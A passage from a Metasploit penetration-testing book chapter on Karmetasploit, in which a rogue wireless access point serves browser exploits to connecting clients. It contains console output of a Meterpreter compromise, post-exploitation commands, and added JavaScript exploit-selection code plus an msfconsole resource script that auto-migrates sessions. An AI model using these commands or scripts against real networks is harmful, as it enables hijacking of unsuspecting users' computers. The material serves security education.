Chapter 12
[*] Sending EXE payload to 10.0.0.100:1371...
[*] Sending stage (748032 bytes) to 10.0.0.100
[*] Meterpreter session 1 opened (10.0.0.1:3333 -> 10.0.0.100:1438)
In this output, you can see that Metasploit first lets the client know
that various popular websites are in fact located on the attacking machine
(its fake DNS server answers every lookup with the attacker's own address).
Then it uses JavaScript to determine the target's operating system and
browser, and responds with exploits chosen to match that fingerprint. The
client is presented with a malicious ActiveX control, resulting in the familiar
yellow prompt bar in Internet Explorer, shown at the top of Figure 12-1. You
can also see, buried in the output, that an exploit was launched against
the client. After a brief period, you see that the exploit was successful
and a Meterpreter session has been opened on the target PC!
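To make the "fingerprint, then pick exploits" step concrete, here is an added example that is not from the book or from Metasploit's browser_autopwn code: a small User-Agent fingerprinter plus a selection routine that matches the fingerprint against a catalogue of exploit requirements. The catalogue entries, their `hypothetical_*` names and the sample User-Agent strings are constructed for illustration.

```javascript
// Added example: User-Agent based OS/browser fingerprinting and exploit selection.
// Not the book's or Metasploit's code; the catalogue and sample UAs are made up.

// Ordered checks: more specific tokens first (Android UAs also contain "Linux").
const OS_MAP = [
  [/Windows NT 5\.1/, 'Windows XP'],
  [/Windows NT 6\.1/, 'Windows 7'],
  [/Windows NT 10\.0/, 'Windows 10'],
  [/Mac OS X/, 'macOS'],
  [/Android/, 'Android'],
  [/Linux/, 'Linux'],
];

function detectOs(ua) {
  for (const [re, name] of OS_MAP) if (re.test(ua)) return name;
  return 'unknown';
}

function detectBrowser(ua) {
  let m;
  if ((m = /MSIE (\d+)/.exec(ua))) return { name: 'IE', major: Number(m[1]) };
  // IE 11 dropped the MSIE token and only reports Trident + rv:
  if ((m = /Trident\/.*rv:(\d+)/.exec(ua))) return { name: 'IE', major: Number(m[1]) };
  if ((m = /Firefox\/(\d+)/.exec(ua))) return { name: 'Firefox', major: Number(m[1]) };
  // Chrome must be tested before Safari because Chrome UAs also contain "Safari"
  if ((m = /Chrome\/(\d+)/.exec(ua))) return { name: 'Chrome', major: Number(m[1]) };
  if ((m = /Version\/(\d+).*Safari/.exec(ua))) return { name: 'Safari', major: Number(m[1]) };
  return { name: 'unknown', major: 0 };
}

function fingerprint(ua) {
  return { os: detectOs(ua), ...detectBrowser(ua) };
}

// Hypothetical catalogue: which OS, browser and version range each entry targets.
// `os` may be an exact string or a regular expression over the detected OS name.
const CATALOGUE = [
  { id: 'hypothetical_ie6_activex', os: 'Windows XP', browser: 'IE', minMajor: 6, maxMajor: 6 },
  { id: 'hypothetical_ie7_8_dom', os: /^Windows/, browser: 'IE', minMajor: 7, maxMajor: 8 },
  { id: 'hypothetical_old_firefox', os: /.*/, browser: 'Firefox', minMajor: 0, maxMajor: 3 },
];

// Return the ids of catalogue entries whose requirements the fingerprint satisfies.
function selectExploits(fp, catalogue = CATALOGUE) {
  return catalogue
    .filter(e => (e.os instanceof RegExp ? e.os.test(fp.os) : e.os === fp.os))
    .filter(e => e.browser === fp.name && fp.major >= e.minMajor && fp.major <= e.maxMajor)
    .map(e => e.id);
}

// Constructed sample User-Agent strings (not captured from the book's lab).
const SAMPLE_UAS = {
  xpIe6: 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
  win7Ie11: 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
  linuxChrome: 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
};

for (const [label, ua] of Object.entries(SAMPLE_UAS)) {
  const fp = fingerprint(ua);
  console.log(label, fp, '->', selectExploits(fp));
}
```

The XP/IE 6 sample matches the single IE 6 entry, while the IE 11 and Chrome samples match nothing, which is exactly the decision the server in the transcript made before serving the ActiveX payload. A User-Agent header is trivially spoofed, which is why browser_autopwn fingerprints with JavaScript running in the browser rather than trusting the header alone.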
Returning to msfconsole, we can interact with the session that was created
and check to see what permissions we have obtained on the target. Remember,
when you exploit a browser it's always a good idea to migrate your process
out of the web browser in case it gets closed.
msf > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: V-XP-SP2-BARE
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > getuid
Server username: V-XP-SP2-BARE\Administrator
meterpreter > run migrate -f
[*] Current server process: jEFiwxBKyjoHGijtP.exe (3448)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2232
[*] New server process: notepad.exe (2232)
meterpreter > screenshot
Screenshot saved to: /opt/metasploit3/msf3/rkGrMLPa.jpeg
meterpreter >
Because this is a default installation of Windows XP SP2 with the very insecure
Internet Explorer 6 installed (both of which are highly out of date), the
client didn't even need to accept and install the malicious ActiveX control.
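Migrating by hand, as above, works for one session, but a Karmetasploit run in a busy area produces many. The following resource-script fragment is an added example, not the book's karma.rc, that tells every new Meterpreter session to migrate on its own. AutoRunScript, LHOST, SRVPORT and URIPATH are real msfconsole/Meterpreter options; the listener address and port are placeholders chosen for this example.

```text
# Added example: auto-migrate every browser_autopwn session (not the book's karma.rc).
# Addresses and ports below are placeholders for your own lab.
use auxiliary/server/browser_autopwn
set LHOST 10.0.0.1
set SRVPORT 55550
set URIPATH /
# Run the same "migrate -f" script shown above as soon as each session opens,
# so the shell survives the victim closing Internet Explorer.
setg AutoRunScript migrate -f
run
```

Setting the option with setg rather than set makes it global, so the exploit modules that browser_autopwn loads behind the scenes inherit it rather than only the auxiliary module you typed it into.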
Wrapping Up
Attacks against wireless networks have been a popular topic for quite some
time. Although this attack can take a bit of setup, imagine its success against a
number of similarly configured clients located in a high-traffic or public area.
This approach to attacking wireless clients is often popular because it’s easier
than a brute force attack against a well-secured wireless infrastructure.
Now that you've seen how easy it is to conduct this sort of attack, you'll
probably think twice about using public wireless networks. Are you sure that
the coffee shop is offering "free public Wi-Fi"? Or perhaps someone is running
Karmetasploit?